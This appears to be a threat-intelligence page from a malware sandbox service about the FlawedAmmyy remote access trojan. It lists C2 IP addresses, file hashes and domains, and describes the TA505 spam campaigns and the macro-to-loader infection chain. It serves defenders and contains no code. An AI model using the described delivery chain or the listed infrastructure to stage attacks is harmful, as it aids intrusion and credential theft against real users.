FlawedAmmyy

49
Global rank
49
Month rank
45
Week rank
82
IOCs

FlawedAmmmyy is a RAT type malware that can be used to perform actions remotely on an infected PC. This malware is well known for being featured in especially large campaigns with wide target demographics.

Trojan
Type
Unknown
Origin
1 January, 2016
First seen
31 October, 2020
Last seen

How to analyze FlawedAmmyy with ANY.RUN

Trojan
Type
Unknown
Origin
1 January, 2016
First seen
31 October, 2020
Last seen

IOCs

IP addresses
136.243.104.235
136.243.104.242
179.60.146.3
160.119.253.219
45.227.252.54
146.0.77.62
169.239.129.54
169.239.128.186
185.99.133.83
185.99.132.12
169.239.129.45
169.239.128.36
169.239.128.15
169.239.128.185
169.239.129.113
169.239.129.103
169.239.129.27
185.99.133.140
185.99.132.119
209.239.123.75
Hashes
ee272df32b119afcfe09ef624d067440deff982563b8d04b92790a59ad561eb8
8baeed8d30b9bfbff3adda3496df1552ab4bed3a7092cb7b56543f9b844b0353
c2cc59c6fd471678b34cf51055a59462a178ec95a5b6b424f464c6611e8bd22a
4080b8b447c028a6fc1e6f235a2231d07bd0cf2999a26151d705474fc7e3b0bf
f55f04cdc44a691f6189dadc5e358ec3a931178d791833061a6beb7159a7169e
a2a5b82d684ad9c0a8e5b7fd0c85d8cdb0f983881559627085591531ee0516d5
0e66554997149a9e7f17f56fb722fb74a5f9656bf210eb6f1c9ba8b760653fa7
248f7d693514c5ad9aab68990884a9dfe4fa5b36298852e7547735ec14ac26ba
e0c1c2ab82ff668a2310652b46a340738b2e7c2cdec90d197ec57b874b0de6dc
526582ad66a0f96cfac8dd11841ba499a34310efbca37799d9217abe6beca88c
df2040d73eb1c722b291d1403f13782a68010cdeb2ac0cad06054b6b894c43e7
6200c7b535db85e418a1c8ab2f9bbfc6f516596bda5c2861f577e896f3c27d58
06df4a5fda733594ce5225118badf6747890ec3a37fe2c59854a54622a809814
c0d74bf228a7f16b96f35a2c0da4071874d39fb51353ca097e0d232a6c6c9286
dd11953288c33ca020301ec639efa1a42f87059fb1adafde58343db7002d4b4b
03318d195541590cce94df7ec95ba899e5cd0dbac813a4042ac7efaa9a01f9ed
6e53d7e07e04b718825f6ab209a74ecbcfc6285097f0c0f9d332e8c0f54e1097
60797554cc5556d0a2e631d34a599a110b620cfdd2438a049ebe355699f510fa
ccb3eb4def241106ba92b6f476e18b529b8cd8253f25cae7cf4cfa2bb293156e
996053ee305ee730f4095d9ee71447dd72815083c8cdf98e048f41185cf2b1d1
Domains
majul.com
isns.net
hhihkonline.ooo
Last Seen at

Recent blog posts

recentPost
How to Create a Task in ANY.RUN:a Step-by-Ste...
watchers 311
comments 0
recentPost
ChatGPT for SOC and Malware Analysis professi...
watchers 5387
comments 0
recentPost
Deobfuscating the Latest GuLoader: Automating...
watchers 3240
comments 3

What is FlawedAmmyy malware?

FlawedAmmyy is a Remote Access Trojan – a malware that is utilized by attackers to take full control over the target machine. It is based on the source code of a completely legitimate program Ammyy Admin. Despite this RAT being recorded as a new malware in 2018, some researchers suggest that it has been in use since 2016.

FlawedAmmyy has been used by multiple attackers in massive email-spam campaigns as well as in highly targeted cyber attacks aimed at businesses in the automotive industry. Among others, a well-known hacker operating under the alias TA505 is known to have been using this malware in large-scale campaigns.

General description of FlawedAmmyy malware

Being built using leaked source code of the third version of Ammyy Admin – which is legitimate remote access and administration program – Flawed Ammyy enables attackers to perform multiple actions on infected Windows PCs. With this malware, hackers can control the desktop remotely, manipulate files, steal credentials, and access audio on an infected machine to potentially collect information about their victims.

The popularity of FlawedAmmy started rising especially quickly in 2018, as the focus of malicious actors started shifting from operating ransomware to other types of malicious programs. In particular, in November of 2018, a threat actor known as TA505 started distributing various loader viruses in their spam email campaigns – using ServHelper at first and later switching to AndroMut – with the end goal of infecting victims with FlawedAmmyy.

In particular, researchers have detected two separate campaigns that distributed FlawedAmmyy using AndroMut loader – the first campaign targeted victims in South Korea with HTML attachments designed to download an Office file with malicious macros which installed a loader which would, in turn, drop the main payload – FlawedAmmyy RAT. The scope of other campaigns featuring AndroMut was more broad and included enterprises in the USA, UAE, and Singapore.

Other campaigns not necessarily by TA505 that took place in 2019 made use of an XLM document that contained a malicious macro that downloaded FlawedAmmyy directly, bypassing the loader stage.

FlawedAmmyy malware analysis

A video recorded in the ANY.RUN malware hunting service displays the execution process of FlawedAmmyy, allowing one to examine it in a convenient and safe environment.

flawedammyy execution process graph

Figure 1: Displays the graph of processes generated by the ANY.RUN malware analyzing service

text report of the flawedammyy analysis

Figure 2: Even more information about the execution of malware can be found in customizable text reports generated by ANY.RUN

FlawedAmmyy execution process

Usually, Flawed Ammyy makes its way into the machine through mail spam in a form of a MS Word or MS Excel document with a malicious macro. Examples of such malicious docs you can find on ANY.RUN's public submissions browsing by tag maldoc-21. After the malicious .xls file is opened, it automatically runs a macro function that runs either msiexec.exe or cmd.exe to download and execute the first stage payload. This first stage executable file then downloads and decrypts another file, which usually has a filename "wsus.exe" and it is the FlawedAmmyy malware itself. Wsus.exe creates persistence in the system and communicates with C2 servers.

Sometimes malicious executable files are digitally signed with a certificate from trusted vendors. Also, it's interesting that trojan checks the user privileges and presence of Anti-Virus programs on the infected machine and changes behavior based on the results of this check. You can also find out how this execution method differs from Trickbot and Zloader.

Distribution of FlawedAmmyy RAT

FlawedAmmyy is distributed with spam email campaigns with subjects usually concerning invoices or receipts. Emails can contain a .zip attachment disguised to contain information related to the email subject, a Microsoft Office file, or an XML attachment. Attached files, in reality, can hold a URL that automatically opens a browser window and redirects victims to a website from where malware samples would be downloaded.

In some campaigns, another virus designed to install the final payload is downloaded first and it then drops FlawedAmmyy onto the machine. Other campaigns made use of something called the Server Message Block (SMB) protocol to download malware directly, bypassing the browser download which is quite a rare trick for malware.

How to prevent FlawedAmmyy attacks?

Once FlawedAmmyy infects a PC, it can operate discreetly without letting users know that their machine is in fact infected. This allows attackers to collect various information about their victims over time and makes this malware potentially very destructive.

However, adhering to simple online safety tips can make avoiding the infection fairly easy – as long as a user never clicks on suspicious links or downloads emails from unknown senders they will be safe. However, things get a little bit more complicated with FlawedAmmy since some of the attacks are very targeted and feature believable emails.

Therefore users are advised to conduct their own checks about email authenticity and pay attention to small details before downloading files or following URLs in their correspondence.

How to export FlawedAmmyy data using ANY.RUN?

Analysts can export all significant events from a task to MISP for further analysis and export to IDS/SIEM systems or simply for share. Just click on the "Export" button and choose "MIST JSON format" in the drop-down menu.

export events from the task with flawedammyy into MISP JSON Figure 3: Export events from the task with flawedammyy into MISP JSON

Summary

FlawedAmmyy RAT is an interesting malware that is capable of operating stealthily on infected machines and causing potentially serious damage with its remote access capabilities. It was featured both in massive, large-scale email spam campaigns as well as in targeted attacks against businesses operating in particular industries which indicates the diversity that operators behind this malware can show in regard to choosing their victims.

Security researchers only documented this malware in 2018 despite its being around since 2016, which means that it managed to operate in the dark for two whole years, evading researchers or maybe even tricking them. Thankfully, modern malware analysis services like ANY.RUN provides multiple specially designed tools to simplify and greatly streamline the research process to help us identify current and future threats.

HAVE A LOOK AT

Adwind screenshot
Adwind
adwind trojan
Adwind RAT, sometimes also called Unrecom, Sockrat, Frutas, jRat, and JSocket, is a Malware As A Service Remote Access Trojan that attackers can use to collect information from infected machines. It was one of the most popular RATs in the market in 2015.
Read More
Agent Tesla screenshot
Agent Tesla
agenttesla trojan rat stealer
Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.
Read More
Amadey screenshot
Amadey
amadey
Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.
Read More
Arkei screenshot
Arkei
arkei stealer
Arkei is a stealer type malware capable of collecting passwords, autosaved forms, cryptocurrency wallet credentials, and files.
Read More
AsyncRAT screenshot
AsyncRAT
asyncrat
AsyncRAT is a RAT that can monitor and remotely control infected systems. This malware was introduced on Github as a legitimate open-source remote administration software, but hackers use it for its many powerful malicious functions.
Read More
Ave Maria screenshot
Ave Maria
avemaria stealer trojan rat
Ave Maria malware is a Remote Access Trojan that is also called WARZONE RAT. Hackers use it to control the PCs of their victims remotely and steal information from infected PCs. For example, they can remotely activate the camera to take pictures of a victim and send them to a control server.
Read More

Our website uses cookies. By visiting the pages of the site, you agree to our Privacy Policy